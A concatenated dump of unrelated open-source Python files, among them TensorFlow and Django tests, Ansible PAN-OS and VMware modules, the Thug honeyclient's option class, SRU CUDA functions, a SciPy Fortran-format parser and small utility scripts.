pass # Filled in below
def _GetMatrixBandPartTest(dtype_, batch_shape_, shape_):
def Test(self):
mat = np.ones(shape_).astype(dtype_)
batch_mat = np.tile(mat, batch_shape + (1, 1))
with self.test_session(use_gpu=True):
for lower in -1, 0, 1, shape_[-2] - 1:
for upper in -1, 0, 1, shape_[-1] - 1:
band_np = mat
if lower >= 0:
band_np = np.triu(band_np, -lower)
if upper >= 0:
band_np = np.tril(band_np, upper)
if batch_shape is not ():
band_np = np.tile(band_np, batch_shape + (1, 1))
band = tf.matrix_band_part(batch_mat, lower, upper)
self.assertAllEqual(band_np, band.eval())
return Test
class MatrixBandPartGradTest(tf.test.TestCase):
pass # Filled in below
def _GetMatrixBandPartGradTest(dtype_, batch_shape_, shape_):
def Test(self):
shape = batch_shape_ + shape_
x = tf.constant(np.random.rand(*shape), dtype=dtype_)
with self.test_session(use_gpu=True):
for lower in -1, 0, 1, shape_[-2] - 1:
for upper in -1, 0, 1, shape_[-1] - 1:
y = tf.matrix_band_part(x, lower, upper)
error = tf.test.compute_gradient_error(x, x.get_shape().as_list(), y,
y.get_shape().as_list())
self.assertLess(error, 1e-4)
return Test
if __name__ == '__main__':
for dtype in np.int32, np.int64, np.float32, np.float64:
for batch_shape in ((), (2,), (1, 3, 2)):
for rows in 1, 2, 7:
for cols in 1, 2, 7:
shape = (rows, cols)
name = '%s_%s' % (dtype.__name__, '_'.join(map(str, shape)))
setattr(MatrixBandPartTest, 'testMatrixBandPart_' + name,
_GetMatrixBandPartTest(dtype, batch_shape, shape))
if dtype == np.float32 or dtype == np.float64:
setattr(MatrixBandPartGradTest, 'testMatrixBandPartGrad_' + name,
_GetMatrixBandPartGradTest(dtype, batch_shape, shape))
tf.test.main()
|
j00bar/ansible | refs/heads/devel | lib/ansible/modules/network/panos/panos_mgtconfig.py | 78 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ansible module to manage PaloAltoNetworks Firewall
# (c) 2016, techbizdev <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: panos_mgtconfig
short_description: configure management settings of device
description:
- Configure management settings of device
author: "Luigi Mori (@jtschichold), Ivan Bojer (@ivanbojer)"
version_added: "2.3"
requirements:
- pan-python
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS device
required: true
password:
description:
- password for authentication
required: true
username:
description:
- username for authentication
required: false
default: "admin"
dns_server_primary:
description:
- address of primary DNS server
required: false
default: None
dns_server_secondary:
description:
- address of secondary DNS server
required: false
default: None
panorama_primary:
description:
- address of primary Panorama server
required: false
default: None
panorama_secondary:
description:
- address of secondary Panorama server
required: false
default: None
commit:
description:
- commit if changed
required: false
default: true
'''
EXAMPLES = '''
- name: set dns and panorama
panos_mgtconfig:
ip_address: "192.168.1.1"
password: "admin"
dns_server_primary: "1.1.1.1"
dns_server_secondary: "1.1.1.2"
panorama_primary: "1.1.1.3"
panorama_secondary: "1.1.1.4"
'''
RETURN='''
# Default return values
'''
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
import pan.xapi
from pan.xapi import PanXapiError
HAS_LIB = True
except ImportError:
HAS_LIB = False
_XPATH_DNS_SERVERS = "/config/devices/entry[@name='localhost.localdomain']" +\
"/deviceconfig/system/dns-setting/servers"
_XPATH_PANORAMA_SERVERS = "/config" +\
"/devices/entry[@name='localhost.localdomain']" +\
"/deviceconfig/system"
def set_dns_server(xapi, new_dns_server, primary=True):
if primary:
tag = "primary"
else:
tag = "secondary"
xpath = _XPATH_DNS_SERVERS+"/"+tag
# check the current element value
xapi.get(xpath)
val = xapi.element_root.find(".//"+tag)
if val is not None:
# element exists
val = val.text
if val == new_dns_server:
return False
element = "<%(tag)s>%(value)s</%(tag)s>" %\
dict(tag=tag, value=new_dns_server)
xapi.edit(xpath, element)
return True
def set_panorama_server(xapi, new_panorama_server, primary=True):
if primary:
tag = "panorama-server"
else:
tag = "panorama-server-2"
xpath = _XPATH_PANORAMA_SERVERS+"/"+tag
# check the current element value
xapi.get(xpath)
val = xapi.element_root.find(".//"+tag)
if val is not None:
# element exists
val = val.text
if val == new_panorama_server:
return False
element = "<%(tag)s>%(value)s</%(tag)s>" %\
dict(tag=tag, value=new_panorama_server)
xapi.edit(xpath, element)
return True
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(required=True, no_log=True),
username=dict(default='admin'),
dns_server_primary=dict(),
dns_server_secondary=dict(),
panorama_primary=dict(),
panorama_secondary=dict(),
commit=dict(type='bool', default=True)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)
if not HAS_LIB:
module.fail_json(msg='pan-python is required for this module')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
dns_server_primary = module.params['dns_server_primary']
dns_server_secondary = module.params['dns_server_secondary']
panorama_primary = module.params['panorama_primary']
panorama_secondary = module.params['panorama_secondary']
commit = module.params['commit']
xapi = pan.xapi.PanXapi(
hostname=ip_address,
api_username=username,
api_password=password
)
changed = False
try:
if dns_server_primary is not None:
changed |= set_dns_server(xapi, dns_server_primary, primary=True)
if dns_server_secondary is not None:
changed |= set_dns_server(xapi, dns_server_secondary, primary=False)
if panorama_primary is not None:
changed |= set_panorama_server(xapi, panorama_primary, primary=True)
if panorama_secondary is not None:
changed |= set_panorama_server(xapi, panorama_secondary, primary=False)
if changed and commit:
xapi.commit(cmd="<commit></commit>", sync=True, interval=1)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
module.exit_json(changed=changed, msg="okey dokey")
if __name__ == '__main__':
main()
|
simbha/mAngE-Gin | refs/heads/master | lib/Django 1.7/django/contrib/auth/tests/test_templates.py | 29 | from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.contrib.auth.views import (
password_reset, password_reset_done, password_reset_confirm,
password_reset_complete, password_change, password_change_done,
)
from django.test import RequestFactory, TestCase
from django.test import override_settings
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
ROOT_URLCONF='django.contrib.auth.tests.urls',
)
class AuthTemplateTests(TestCase):
def test_titles(self):
rf = RequestFactory()
user = User.objects.create_user('jsmith', '[email protected]', 'pass')
user = authenticate(username=user.username, password='pass')
request = rf.get('/somepath/')
request.user = user
response = password_reset(request, post_reset_redirect='dummy/')
self.assertContains(response, '<title>Password reset</title>')
self.assertContains(response, '<h1>Password reset</h1>')
response = password_reset_done(request)
self.assertContains(response, '<title>Password reset successful</title>')
self.assertContains(response, '<h1>Password reset successful</h1>')
# password_reset_confirm invalid token
response = password_reset_confirm(request, uidb64='Bad', token='Bad', post_reset_redirect='dummy/')
self.assertContains(response, '<title>Password reset unsuccessful</title>')
self.assertContains(response, '<h1>Password reset unsuccessful</h1>')
# password_reset_confirm valid token
default_token_generator = PasswordResetTokenGenerator()
token = default_token_generator.make_token(user)
uidb64 = force_text(urlsafe_base64_encode(force_bytes(user.pk)))
response = password_reset_confirm(request, uidb64, token, post_reset_redirect='dummy/')
self.assertContains(response, '<title>Enter new password</title>')
self.assertContains(response, '<h1>Enter new password</h1>')
response = password_reset_complete(request)
self.assertContains(response, '<title>Password reset complete</title>')
self.assertContains(response, '<h1>Password reset complete</h1>')
response = password_change(request, post_change_redirect='dummy/')
self.assertContains(response, '<title>Password change</title>')
self.assertContains(response, '<h1>Password change</h1>')
response = password_change_done(request)
self.assertContains(response, '<title>Password change successful</title>')
self.assertContains(response, '<h1>Password change successful</h1>')
|
palaniyappanBala/thug | refs/heads/master | src/ThugAPI/ThugOpts.py | 4 | #!/usr/bin/env python
#
# ThugOpts.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import sys
import os
import datetime
import logging
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
from DOM.Personality import Personality
log = logging.getLogger("Thug")
class ThugOpts(dict):
proxy_schemes = ('http', 'socks4', 'socks5', )
def __init__(self):
self._proxy_info = None
self._proxy = None
self.local = False
self.extensive = False
self._threshold = 0
self._timeout = None
self._timeout_in_secs = None
self.ast_debug = False
self.http_debug = 0
self._useragent = 'winxpie60'
self._referer = 'about:blank'
self._events = list()
self._delay = 0
self._file_logging = False
self._json_logging = False
self._maec11_logging = False
self._no_fetch = False
self._broken_url = False
self._vt_query = False
self._vt_submit = False
self._vt_runtime_apikey = None
self._mongodb_address = None
self._web_tracking = False
self._honeyagent = True
self._cache = '/tmp/thug-cache-%s' % (os.getuid(), )
self.Personality = Personality()
def set_proxy(self, proxy):
p = urlparse.urlparse(proxy)
if p.scheme.lower() not in self.proxy_schemes:
log.warning('[ERROR] Invalid proxy scheme (valid schemes: http, socks4, socks5)')
sys.exit(0)
self._proxy = proxy
def get_proxy(self):
return self._proxy
proxy = property(get_proxy, set_proxy)
def get_useragent(self):
return self._useragent
def set_useragent(self, useragent):
if not useragent in self.Personality:
log.warning('[WARNING] Invalid User Agent provided (using default "%s")' % (self._useragent, ))
return
self._useragent = useragent
useragent = property(get_useragent, set_useragent)
def get_referer(self):
return self._referer
def set_referer(self, referer):
self._referer = referer
referer = property(get_referer, set_referer)
def get_events(self):
return self._events
def set_events(self, events):
for e in events.split(","):
self._events.append(e.lower().strip())
events = property(get_events, set_events)
def get_delay(self):
return self._delay
def set_delay(self, timeout):
try:
_timeout = int(timeout)
except:
log.warning('[WARNING] Ignoring invalid delay value (should be an integer)')
return
self._delay = abs(_timeout)
delay = property(get_delay, set_delay)
def get_file_logging(self):
return self._file_logging
def set_file_logging(self, file_logging):
self._file_logging = file_logging
file_logging = property(get_file_logging, set_file_logging)
def get_json_logging(self):
return self._json_logging
def set_json_logging(self, json_logging):
self._json_logging = json_logging
json_logging = property(get_json_logging, set_json_logging)
def get_maec11_logging(self):
return self._maec11_logging
def set_maec11_logging(self, maec11_logging):
self._maec11_logging = maec11_logging
maec11_logging = property(get_maec11_logging, set_maec11_logging)
def get_no_fetch(self):
return self._no_fetch
def set_no_fetch(self, fetch):
self._no_fetch = fetch
no_fetch = property(get_no_fetch, set_no_fetch)
def get_cache(self):
return self._cache
def set_cache(self, cache):
self._cache = cache
cache = property(get_cache, set_cache)
def get_threshold(self):
return self._threshold
def set_threshold(self, threshold):
try:
value = int(threshold)
except:
log.warning('[WARNING] Ignoring invalid threshold value (should be an integer)')
return
self._threshold = value
threshold = property(get_threshold, set_threshold)
def get_timeout(self):
return self._timeout
def set_timeout(self, timeout):
self._timeout_in_secs = timeout
try:
seconds = int(timeout)
except:
log.warning('[WARNING] Ignoring invalid timeout value (should be an integer)')
return
now = datetime.datetime.now()
delta = datetime.timedelta(seconds = seconds)
self._timeout = now + delta
timeout = property(get_timeout, set_timeout)
def get_broken_url(self):
return self._broken_url
def set_broken_url(self, mode):
self._broken_url = mode
broken_url = property(get_broken_url, set_broken_url)
def get_vt_query(self):
return self._vt_query
def set_vt_query(self):
self._vt_query = True
vt_query = property(get_vt_query, set_vt_query)
def get_vt_submit(self):
return self._vt_submit
def set_vt_submit(self):
self._vt_submit = True
vt_submit = property(get_vt_submit, set_vt_submit)
def get_vt_runtime_apikey(self):
return self._vt_runtime_apikey
def set_vt_runtime_apikey(self, vt_apikey):
self._vt_runtime_apikey = vt_apikey
vt_runtime_apikey = property(get_vt_runtime_apikey, set_vt_runtime_apikey)
def get_web_tracking(self):
return self._web_tracking
def set_web_tracking(self, enabled):
self._web_tracking = enabled
web_tracking = property(get_web_tracking, set_web_tracking)
def get_honeyagent(self):
return self._honeyagent
def set_honeyagent(self, enabled):
self._honeyagent = enabled
honeyagent = property(get_honeyagent, set_honeyagent)
def get_mongodb_address(self):
return self._mongodb_address
def set_mongodb_address(self, mongodb_address):
self._mongodb_address = mongodb_address
mongodb_address = property(get_mongodb_address, set_mongodb_address)
|
taolei87/sru | refs/heads/master | sru/cuda_functional.py | 1 | import os
import torch
from torch.autograd import Function
from torch.utils.cpp_extension import load
sources = [
os.path.join(os.path.dirname(__file__), "sru_cuda_impl.cpp"),
os.path.join(os.path.dirname(__file__), "sru_cuda_kernel.cu"),
]
sru_cuda_lib = load(
name="sru_cuda_impl",
sources=sources,
extra_cflags=['-O3'],
verbose=False
)
empty_btensor = torch.ByteTensor()
empty_ftensor = torch.FloatTensor()
class SRU_Compute_GPU(Function):
@staticmethod
def forward(ctx, u, x, weight_c, bias,
init,
activation_type,
d_out,
bidirectional,
has_skip_term,
scale_x,
mask_c=None,
mask_pad=None):
ctx.activation_type = activation_type
ctx.d_out = d_out
ctx.bidirectional = bidirectional
ctx.has_skip_term = has_skip_term
ctx.scale_x = scale_x
# ensure mask_pad is a byte tensor
mask_pad = mask_pad.byte().contiguous() if mask_pad is not None else None
ctx.mask_pad = mask_pad
bidir = 2 if bidirectional else 1
length = x.size(0) if x.dim() == 3 else 1
batch = x.size(-2)
d = d_out
if mask_pad is not None:
assert mask_pad.size(0) == length
assert mask_pad.size(1) == batch
k = u.size(-1) // d
k_ = k // 2 if bidirectional else k
skip_type = 0 if not has_skip_term else (1 if k_ == 3 else 2)
ncols = batch * d * bidir
is_custom = len(weight_c.size()) > 1
size = (length, batch, d * bidir) if x.dim() == 3 else (batch, d * bidir)
c = x.new_zeros(*size)
h = x.new_zeros(*size)
if skip_type > 0 and k_ == 3:
x_ = x.contiguous() * scale_x if scale_x is not None else x.contiguous()
else:
x_ = empty_ftensor
forward_func = sru_cuda_lib.sru_bi_forward if bidirectional else \
sru_cuda_lib.sru_forward
forward_func(
h,
c,
u.contiguous(),
x_,
weight_c.contiguous(),
bias,
init.contiguous(),
mask_c if mask_c is not None else empty_ftensor,
mask_pad.contiguous() if mask_pad is not None else empty_btensor,
length,
batch,
d,
k_,
activation_type,
skip_type,
is_custom
)
ctx.save_for_backward(u, x, weight_c, bias, init, mask_c)
ctx.intermediate = c
if x.dim() == 2:
last_hidden = c
elif bidirectional:
last_hidden = torch.cat((c[-1, :, :d], c[0, :, d:]), dim=1)
else:
last_hidden = c[-1]
return h, last_hidden
@staticmethod
def backward(ctx, grad_h, grad_last):
bidir = 2 if ctx.bidirectional else 1
u, x, weight_c, bias, init, mask_c = ctx.saved_tensors
c = ctx.intermediate
scale_x = ctx.scale_x
mask_pad = ctx.mask_pad
length = x.size(0) if x.dim() == 3 else 1
batch = x.size(-2)
d = ctx.d_out
k = u.size(-1) // d
k_ = k // 2 if ctx.bidirectional else k
skip_type = 0 if not ctx.has_skip_term else (1 if k_ == 3 else 2)
ncols = batch * d * bidir
is_custom = len(weight_c.size()) > 1
grad_u = u.new_zeros(*u.size())
grad_init = x.new_zeros(batch, d * bidir)
grad_x = x.new_zeros(*x.size()) if skip_type > 0 and k_ == 3 else None
grad_bias = x.new_zeros(2, batch, bidir * d)
if not is_custom:
grad_wc = x.new_zeros(2, batch, bidir * d)
else:
grad_wc = weight_c.new_zeros(*weight_c.size())
if skip_type > 0 and k_ == 3:
x_ = x.contiguous() * scale_x if scale_x is not None else x.contiguous()
else:
x_ = empty_ftensor
backward_func = sru_cuda_lib.sru_bi_backward if ctx.bidirectional else \
sru_cuda_lib.sru_backward
backward_func(
grad_u,
grad_x if skip_type > 0 and k_ == 3 else empty_ftensor,
grad_wc,
grad_bias,
grad_init,
u.contiguous(),
x_,
weight_c.contiguous(),
bias,
init.contiguous(),
mask_c if mask_c is not None else empty_ftensor,
mask_pad.contiguous() if mask_pad is not None else empty_btensor,
c,
grad_h.contiguous(),
grad_last.contiguous(),
length,
batch,
d,
k_,
ctx.activation_type,
skip_type,
is_custom
)
if skip_type > 0 and k_ == 3 and scale_x is not None:
grad_x.mul_(scale_x)
if not is_custom:
grad_wc = grad_wc.sum(1).view(-1)
return grad_u, grad_x, grad_wc, grad_bias.sum(1).view(-1), grad_init, \
None, None, None, None, None, None, None
|
nurmd2/nurmd | refs/heads/master | openerp/addons/test_new_api/tests/test_field_conversions.py | 47 | # -*- coding: utf-8 -*-
from openerp import fields
from openerp.tests import common
class TestFieldToColumn(common.TransactionCase):
def test_char(self):
# create a field, initialize its attributes, and convert it to a column
field = fields.Char(string="test string", required=True)
field.setup_base(self.env['res.partner'], 'test')
column = field.to_column()
self.assertEqual(column.string, "test string")
self.assertTrue(column.required)
|
niknow/scipy | refs/heads/master | scipy/io/harwell_boeing/_fortran_format_parser.py | 127 | """
Preliminary module to handle fortran formats for IO. Does not use this outside
scipy.sparse io for now, until the API is deemed reasonable.
The *Format classes handle conversion between fortran and python format, and
FortranFormatParser can create *Format instances from raw fortran format
strings (e.g. '(3I4)', '(10I3)', etc...)
"""
from __future__ import division, print_function, absolute_import
import re
import warnings
import numpy as np
__all__ = ["BadFortranFormat", "FortranFormatParser", "IntFormat", "ExpFormat"]
TOKENS = {
"LPAR": r"\(",
"RPAR": r"\)",
"INT_ID": r"I",
"EXP_ID": r"E",
"INT": r"\d+",
"DOT": r"\.",
}
class BadFortranFormat(SyntaxError):
pass
def number_digits(n):
return int(np.floor(np.log10(np.abs(n))) + 1)
class IntFormat(object):
@classmethod
def from_number(cls, n, min=None):
"""Given an integer, returns a "reasonable" IntFormat instance to represent
any number between 0 and n if n > 0, -n and n if n < 0
Parameters
----------
n : int
max number one wants to be able to represent
min : int
minimum number of characters to use for the format
Returns
-------
res : IntFormat
IntFormat instance with reasonable (see Notes) computed width
Notes
-----
Reasonable should be understood as the minimal string length necessary
without losing precision. For example, IntFormat.from_number(1) will
return an IntFormat instance of width 2, so that any 0 and 1 may be
represented as 1-character strings without loss of information.
"""
width = number_digits(n) + 1
if n < 0:
width += 1
repeat = 80 // width
return cls(width, min, repeat=repeat)
def __init__(self, width, min=None, repeat=None):
self.width = width
self.repeat = repeat
self.min = min
def __repr__(self):
r = "IntFormat("
if self.repeat:
r += "%d" % self.repeat
r += "I%d" % self.width
if self.min:
r += ".%d" % self.min
return r + ")"
@property
def fortran_format(self):
r = "("
if self.repeat:
r += "%d" % self.repeat
r += "I%d" % self.width
if self.min:
r += ".%d" % self.min
return r + ")"
@property
def python_format(self):
return "%" + str(self.width) + "d"
class ExpFormat(object):
@classmethod
def from_number(cls, n, min=None):
"""Given a float number, returns a "reasonable" ExpFormat instance to
represent any number between -n and n.
Parameters
----------
n : float
max number one wants to be able to represent
min : int
minimum number of characters to use for the format
Returns
-------
res : ExpFormat
ExpFormat instance with reasonable (see Notes) computed width
Notes
-----
Reasonable should be understood as the minimal string length necessary
to avoid losing precision.
"""
# len of one number in exp format: sign + 1|0 + "." +
# number of digit for fractional part + 'E' + sign of exponent +
# len of exponent
finfo = np.finfo(n.dtype)
# Number of digits for fractional part
n_prec = finfo.precision + 1
# Number of digits for exponential part
n_exp = number_digits(np.max(np.abs([finfo.maxexp, finfo.minexp])))
width = 1 + 1 + n_prec + 1 + n_exp + 1
if n < 0:
width += 1
repeat = int(np.floor(80 / width))
return cls(width, n_prec, min, repeat=repeat)
def __init__(self, width, significand, min=None, repeat=None):
"""\
Parameters
----------
width : int
number of characters taken by the string (includes space).
"""
self.width = width
self.significand = significand
self.repeat = repeat
self.min = min
def __repr__(self):
r = "ExpFormat("
if self.repeat:
r += "%d" % self.repeat
r += "E%d.%d" % (self.width, self.significand)
if self.min:
r += "E%d" % self.min
return r + ")"
@property
def fortran_format(self):
r = "("
if self.repeat:
r += "%d" % self.repeat
r += "E%d.%d" % (self.width, self.significand)
if self.min:
r += "E%d" % self.min
return r + ")"
@property
def python_format(self):
return "%" + str(self.width-1) + "." + str(self.significand) + "E"
class Token(object):
def __init__(self, type, value, pos):
self.type = type
self.value = value
self.pos = pos
def __str__(self):
return """Token('%s', "%s")""" % (self.type, self.value)
def __repr__(self):
return self.__str__()
class Tokenizer(object):
def __init__(self):
self.tokens = list(TOKENS.keys())
self.res = [re.compile(TOKENS[i]) for i in self.tokens]
def input(self, s):
self.data = s
self.curpos = 0
self.len = len(s)
def next_token(self):
curpos = self.curpos
tokens = self.tokens
while curpos < self.len:
for i, r in enumerate(self.res):
m = r.match(self.data, curpos)
if m is None:
continue
else:
self.curpos = m.end()
return Token(self.tokens[i], m.group(), self.curpos)
else:
raise SyntaxError("Unknown character at position %d (%s)"
% (self.curpos, self.data[curpos]))
# Grammar for fortran format:
# format : LPAR format_string RPAR
# format_string : repeated | simple
# repeated : repeat simple
# simple : int_fmt | exp_fmt
# int_fmt : INT_ID width
# exp_fmt : simple_exp_fmt
# simple_exp_fmt : EXP_ID width DOT significand
# extended_exp_fmt : EXP_ID width DOT significand EXP_ID ndigits
# repeat : INT
# width : INT
# significand : INT
# ndigits : INT
# Naive fortran formatter - parser is hand-made
class FortranFormatParser(object):
"""Parser for fortran format strings. The parse method returns a *Format
instance.
Notes
-----
Only ExpFormat (exponential format for floating values) and IntFormat
(integer format) for now.
"""
def __init__(self):
self.tokenizer = Tokenizer()
def parse(self, s):
self.tokenizer.input(s)
tokens = []
try:
while True:
t = self.tokenizer.next_token()
if t is None:
break
else:
tokens.append(t)
return self._parse_format(tokens)
except SyntaxError as e:
raise BadFortranFormat(str(e))
def _get_min(self, tokens):
next = tokens.pop(0)
if not next.type == "DOT":
raise SyntaxError()
next = tokens.pop(0)
return next.value
def _expect(self, token, tp):
if not token.type == tp:
raise SyntaxError()
def _parse_format(self, tokens):
if not tokens[0].type == "LPAR":
raise SyntaxError("Expected left parenthesis at position "
"%d (got '%s')" % (0, tokens[0].value))
elif not tokens[-1].type == "RPAR":
raise SyntaxError("Expected right parenthesis at position "
"%d (got '%s')" % (len(tokens), tokens[-1].value))
tokens = tokens[1:-1]
types = [t.type for t in tokens]
if types[0] == "INT":
repeat = int(tokens.pop(0).value)
else:
repeat = None
next = tokens.pop(0)
if next.type == "INT_ID":
next = self._next(tokens, "INT")
width = int(next.value)
if tokens:
min = int(self._get_min(tokens))
else:
min = None
return IntFormat(width, min, repeat)
elif next.type == "EXP_ID":
next = self._next(tokens, "INT")
width = int(next.value)
next = self._next(tokens, "DOT")
next = self._next(tokens, "INT")
significand = int(next.value)
if tokens:
next = self._next(tokens, "EXP_ID")
next = self._next(tokens, "INT")
min = int(next.value)
else:
min = None
return ExpFormat(width, significand, min, repeat)
else:
raise SyntaxError("Invalid formater type %s" % next.value)
def _next(self, tokens, tp):
if not len(tokens) > 0:
raise SyntaxError()
next = tokens.pop(0)
self._expect(next, tp)
return next
|
Dhivyap/ansible | refs/heads/devel | lib/ansible/modules/cloud/vmware/vmware_host_feature_info.py | 21 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_host_feature_info
short_description: Gathers info about an ESXi host's feature capability information
description:
- This module can be used to gather information about an ESXi host's feature capability information when ESXi hostname or Cluster name is given.
version_added: '2.9'
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster from all host systems to be used for information gathering.
- If C(esxi_hostname) is not given, this parameter is required.
type: str
esxi_hostname:
description:
- ESXi hostname to gather information from.
- If C(cluster_name) is not given, this parameter is required.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather feature capability info about all ESXi Hosts in given Cluster
vmware_host_feature_info:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: cluster_name
delegate_to: localhost
register: all_cluster_hosts_info
- name: Check if ESXi is vulnerable for Speculative Store Bypass Disable (SSBD) vulnerability
vmware_host_feature_info:
hostname: "{{ vcenter_server }}"
username: "{{ vcenter_user }}"
password: "{{ vcenter_pass }}"
validate_certs: no
esxi_hostname: "{{ esxi_hostname }}"
register: features_set
- set_fact:
ssbd : "{{ item.value }}"
loop: "{{ features_set.host_feature_info[esxi_hostname] |json_query(name) }}"
vars:
name: "[?key=='cpuid.SSBD']"
- assert:
that:
- ssbd|int == 1
when: ssbd is defined
'''
RETURN = r'''
hosts_feature_info:
description: metadata about host's feature capability information
returned: always
type: dict
sample: {
"10.76.33.226": [
{
"feature_name": "cpuid.3DNOW",
"key": "cpuid.3DNOW",
"value": "0"
},
{
"feature_name": "cpuid.3DNOWPLUS",
"key": "cpuid.3DNOWPLUS",
"value": "0"
},
]
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi
class FeatureCapabilityInfoManager(PyVmomi):
def __init__(self, module):
super(FeatureCapabilityInfoManager, self).__init__(module)
cluster_name = self.params.get('cluster_name', None)
esxi_host_name = self.params.get('esxi_hostname', None)
self.hosts = self.get_all_host_objs(cluster_name=cluster_name, esxi_host_name=esxi_host_name)
def gather_host_feature_info(self):
host_feature_info = dict()
for host in self.hosts:
host_feature_capabilities = host.config.featureCapability
capability = []
for fc in host_feature_capabilities:
temp_dict = {
'key': fc.key,
'feature_name': fc.featureName,
'value': fc.value,
}
capability.append(temp_dict)
host_feature_info[host.name] = capability
return host_feature_info
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
cluster_name=dict(type='str', required=False),
esxi_hostname=dict(type='str', required=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'esxi_hostname'],
],
supports_check_mode=True,
)
host_capability_manager = FeatureCapabilityInfoManager(module)
module.exit_json(changed=False,
hosts_feature_info=host_capability_manager.gather_host_feature_info())
if __name__ == "__main__":
main()
|
mglukhikh/intellij-community | refs/heads/master | python/lib/Lib/email/mime/multipart.py | 93 | # Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Base class for MIME multipart/* type messages."""
__all__ = ['MIMEMultipart']
from email.mime.base import MIMEBase
class MIMEMultipart(MIMEBase):
"""Base class for MIME multipart/* type messages."""
def __init__(self, _subtype='mixed', boundary=None, _subparts=None,
**_params):
"""Creates a multipart/* type message.
By default, creates a multipart/mixed message, with proper
Content-Type and MIME-Version headers.
_subtype is the subtype of the multipart content type, defaulting to
`mixed'.
boundary is the multipart boundary string. By default it is
calculated as needed.
_subparts is a sequence of initial subparts for the payload. It
must be an iterable object, such as a list. You can always
attach new subparts to the message by using the attach() method.
Additional parameters for the Content-Type header are taken from the
keyword arguments (or passed into the _params argument).
"""
MIMEBase.__init__(self, 'multipart', _subtype, **_params)
if _subparts:
for p in _subparts:
self.attach(p)
if boundary:
self.set_boundary(boundary)
|
sabi0/intellij-community | refs/heads/master | python/testData/optimizeImports/importStar.py | 83 | from sys import *
from re import *
compile
|
epage/dialcentral-gtk | refs/heads/master | src/util/concurrent.py | 4 | #!/usr/bin/env python
from __future__ import with_statement
import os
import errno
import time
import functools
import contextlib
def synchronized(lock):
"""
Synchronization decorator.
>>> import misc
>>> misc.validate_decorator(synchronized(object()))
"""
def wrap(f):
@functools.wraps(f)
def newFunction(*args, **kw):
lock.acquire()
try:
return f(*args, **kw)
finally:
lock.release()
return newFunction
return wrap
@contextlib.contextmanager
def qlock(queue, gblock = True, gtimeout = None, pblock = True, ptimeout = None):
"""
Locking with a queue, good for when you want to lock an item passed around
>>> import Queue
>>> item = 5
>>> lock = Queue.Queue()
>>> lock.put(item)
>>> with qlock(lock) as i:
... print i
5
"""
item = queue.get(gblock, gtimeout)
try:
yield item
finally:
queue.put(item, pblock, ptimeout)
@contextlib.contextmanager
def flock(path, timeout=-1):
WAIT_FOREVER = -1
DELAY = 0.1
timeSpent = 0
acquired = False
while timeSpent <= timeout or timeout == WAIT_FOREVER:
try:
fd = os.open(path, os.O_CREAT | os.O_EXCL | os.O_RDWR)
acquired = True
break
except OSError, e:
if e.errno != errno.EEXIST:
raise
time.sleep(DELAY)
timeSpent += DELAY
assert acquired, "Failed to grab file-lock %s within timeout %d" % (path, timeout)
try:
yield fd
finally:
os.unlink(path)
|
dehein/pypigpio | refs/heads/master | pin13.py | 1 | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(13, GPIO.OUT)
GPIO.output(13, GPIO.HIGH)
time.sleep(1/5.0)
GPIO.output(13, GPIO.LOW)
time.sleep(1)
print('PIN13 an und ausgeschaltet')
exit()
|
devs1991/test_edx_docmode | refs/heads/master | venv/lib/python2.7/site-packages/provider/tests/test_utils.py | 3 | """
Test cases for functionality provided by the provider.utils module
"""
from datetime import datetime, date
from django.db import models
from django.test import TestCase
from provider import utils
class UtilsTestCase(TestCase):
def test_serialization(self):
class SomeModel(models.Model):
dt = models.DateTimeField()
t = models.TimeField()
